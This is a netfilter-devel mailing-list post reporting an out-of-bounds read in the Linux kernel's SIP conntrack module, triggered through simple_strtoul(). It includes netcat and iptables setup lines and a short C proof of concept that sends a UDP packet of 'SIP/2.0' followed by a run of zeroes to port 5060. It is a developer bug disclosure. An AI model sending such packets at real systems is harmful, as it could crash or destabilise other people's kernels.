There is a bug waiting to happen in SIP conntracking module.
Look at sip_help_udp() => process_sip_response() => simple_strtoul() sequence.
simple_strtoul() can consume infinite amount of characters because
it doesn't doesn't on overflow and read past end of buffer.
Passing long stream of zeroes works.
I wasted a lot of time trying to reproduce remote crash only to find out
that "struct skb_shared_info" is shipped at the end of data attached to skb
and thus acts like terminator (enough characters which are not 0-9).
In slab debug kernels simple_stroul() call definitely stops at poison byte
(easy to check).
So, the crash exists but masked(fully?) by skb internals.
Not knowing SIP protocol, I'm not sending a patch. :-)
Attaching my lame "reproducer" which sends string
"SIP/2.0 0000000000...0"
Alexey
nc -u -l -p 5060
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p udp --dport 5060 -j ACCEPT
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define N 70
int main(int argc, char *argv[])
{
struct sockaddr_in addr;
int fd;
unsigned char *buf;
buf = malloc(8 + N);
memcpy(buf, "SIP/2.0 ", 8);
memset(buf + 8, '0', N - 8);
fd = socket(AF_INET, SOCK_DGRAM, 0);
memset(&addr, 0, sizeof(struct sockaddr_in));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
addr.sin_port = htons(5060);
// while (1) {
sendto(fd, buf, N, 0, (struct sockaddr *)&addr,
sizeof(struct sockaddr_in));
// }
return 0;
}
--
To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
